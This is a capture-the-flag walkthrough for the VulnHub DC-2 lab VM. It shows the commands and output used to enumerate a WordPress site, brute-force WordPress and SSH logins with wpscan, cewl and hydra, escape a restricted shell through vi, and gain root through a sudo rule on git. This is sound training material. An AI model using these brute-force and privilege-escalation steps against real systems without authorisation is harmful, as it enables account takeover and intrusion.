Original Description
Much like DC-1, DC-2 is another purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing.
As with the original DC-1, it’s designed with beginners in mind.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
Just like with DC-1, there are five flags including the final flag.
And again, just like with DC-1, the flags are important for beginners, but not so important for those who have experience.
In short, the only flag that really counts, is the final flag.
For beginners, Google is your friend. Well, apart from all the privacy concerns etc etc.
I haven’t explored all the ways to achieve root, as I scrapped the previous version I had been working on, and started completely fresh apart from the base OS install.
Technical Information
DC-2 is a VirtualBox VM built on Debian 32 bit, so there should be no issues running it on most PCs.
While I haven’t tested it within a VMware environment, it should also work.
It is currently configured for Bridged Networking, however, this can be changed to suit your requirements. Networking is configured for DHCP.
Installation is simple - download it, unzip it, and then import it into VirtualBox and away you go.
Please note that you will need to set the hosts file on your pentesting device to something like:
/etc/hosts
192.168.0.145 dc-2
- Obviously, replace 192.168.0.145 with the actual IP address of DC-2.
It will make life a whole lot simpler (and a certain CMS may not work without it).
If you’re not sure how to do this, instructions are here.
Recon
Find IP
nmap -sn 10.128.1.150-200
- Changed dhcp range
Create /etc/hosts
entry
/etc/hosts
10.128.1.155 dc-2
Find open ports
root@kali:~/vulnhub/dc2# nmap -p- -A 10.128.1.155
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-05 10:29 EST
Nmap scan report for dc-2 (10.128.1.155)
Host is up (0.0011s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-generator: WordPress 4.7.10
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: DC-2 – Just another WordPress site
|_https-redirect: ERROR: Script execution failed (use -d to debug)
7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey:
| 1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
| 2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
| 256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_ 256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
MAC Address: 00:0C:29:9D:5E:27 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 1.11 ms dc-2 (10.128.1.155)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.13 seconds
- Wordpress this time
Wordpress
wpscan
root@kali:~/vulnhub/dc2# wpscan --url http://dc-2
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.7.5
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]y
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://dc-2/
[+] Started: Sun Jan 5 10:31:52 2020
Interesting Finding(s):
[+] http://dc-2/
| Interesting Entry: Server: Apache/2.4.10 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] http://dc-2/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] http://dc-2/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] http://dc-2/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).
| Found By: Rss Generator (Passive Detection)
| - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
| - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
|
| [!] 21 vulnerabilities identified:
|
...
Wordpress Version
21 known vulnerabilities
Enumerate Users
root@kali:~/vulnhub/dc2# wpscan --url http://dc-2 --rua --enumerate u
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:01 <===========================================================================================> (10 / 10) 100.00% Time: 00:00:01
[i] User(s) Identified:
[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] jerry
| Found By: Wp Json Api (Aggressive Detection)
| - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] tom
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
Ok, so we found three users:
admin
jerry
tom
Opening the page gave us Flag 1 . So next goal is login to wordpress.
We got the hint to be cewl
! That’s a tool to generate passwords out of the text of webpages.
Generate wordlist
root@kali:~/vulnhub/dc2# cewl -w passwords http://dc-2
Find matching passwords
root@kali:~/vulnhub/dc2# wpscan --url http://dc-2 -P passwords -U 'admin,tom,jerry'
[i] Valid Combinations Found:
| Username: jerry, Password: adipiscing
| Username: tom, Password: parturient
So login with one of the two users and check flag .
and you will find the nextSSH
Check if one of the Wordpress passwords are working on the SSH port (see nmap).
root@kali:~/vulnhub/dc2# cat users
admin
tom
jerry
root@kali:~/vulnhub/dc2# cat success_pw
parturient
adipiscing
root@kali:~/vulnhub/dc2# hydra -L users -P success_pw -u 10.128.1.155 -s 7744 ssh
[DATA] attacking ssh://10.128.1.155:7744/
[7744][ssh] host: 10.128.1.155 login: tom password: parturient
Now try ssh with user tom
root@kali:~/vulnhub/dc2# man ssh
root@kali:~/vulnhub/dc2# ssh tom@10.128.1.155 -p 7744
The authenticity of host '[10.128.1.155]:7744 ([10.128.1.155]:7744)' can't be established.
ECDSA key fingerprint is SHA256:ZbyT03GNDQgEmA5AMiTX2N685NTzZuOoyMDIA+DW1qU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? ye
Please type 'yes', 'no' or the fingerprint: yes
Warning: Permanently added '[10.128.1.155]:7744' (ECDSA) to the list of known hosts.
tom@10.128.1.155's password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
tom@DC-2:~$ ls
flag3.txt usr
tom@DC-2:~$ cat flag3.txt
-rbash: cat: command not found
tom@DC-2:~$ ls usr/bin
less ls scp vi
tom@DC-2:~$ less flag3.txt
Escape rbash
We have a very limit shell (rbash
) and ~/usr/bin
only shows less
, ls
, scp
and vi
, but with vi
or less
we can read flag3.txt .
Run external command in vi
vi
can run external commands, so I tried running :set shell=/bin/bash
and :! /bin/bash
from within vi
. I got a better shell.
SHELL
and PATH
export PATH=/bin:/usr/bin:$PATH
export SHELL=/bin/bash
There is no need to su
into the jerry
useraccount to read flag4, but you need it to get to the last flag. Flag4
is world readable in his home.
Jerry
wasn’t allowed to login with ssh
, but it works on the console:
tom@DC-2:/$ su jerry
Password:
jerry@DC-2:/$ sudo -l
User jerry may run the following commands on DC-2:
(root) NOPASSWD: /usr/bin/git
- Use the password found with
wpscan
here
I had some headaches how to get git
to open a root
-shell.
Root Shell with git
git help add
for example opens the man page of git add
. Default program to open the man page is less
here. less
can - like vi
before - run external commands. So ! /bin/bash
within less runs a new bash
. Jerry
is allowed to run git
with sudo
. So that’s the trick to get the final flag.
jerry@DC-2:/$ sudo git help add
root@DC-2:/# cd
root@DC-2:~# ls
final-flag.txt
root@DC-2:~# cat /root/final-flag.txt
So we got the Final Flag .
Flags
Flag 1
Found directly as Wordpress Post:
Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.
More passwords is always better, but sometimes you just can’t win them all.
Log in as one to see the next flag.
If you can’t find it, log in as another.
Flag 2
Login is tom
or jerry
and check
If you can't exploit WordPress and take a shortcut, there is another way.
Hope you found another entry point.
Flag 3
/home/tom/flag3.txt
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
Flag 4
/home/jerry/flag4.txt
Good to see that you've made it this far - but you're not home yet.
You still need to get the final flag (the only flag that really counts!!!).
No hints here - you're on your own now. :-)
Go on - git outta here!!!!
Final Flag
/root/final-flag.txt
__ __ _ _ _ _
/ / /\ \ \___| | | __| | ___ _ __ ___ / \
\ \/ \/ / _ \ | | / _` |/ _ \| '_ \ / _ \/ /
\ /\ / __/ | | | (_| | (_) | | | | __/\_/
\/ \/ \___|_|_| \__,_|\___/|_| |_|\___\/
Congratulatons!!!
A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.
If you enjoyed this CTF, send me a tweet via @DCAU7.
Final thoughts
This machine was real fun! I learned some new tools and ways to start shells. Never ran a shell through an editor like vi
or less
before.
cewl
was completely new for me and I already think about how to use it more often.
Thanks to @DCAU7 ! Seeing forward to the other machines in the DC Series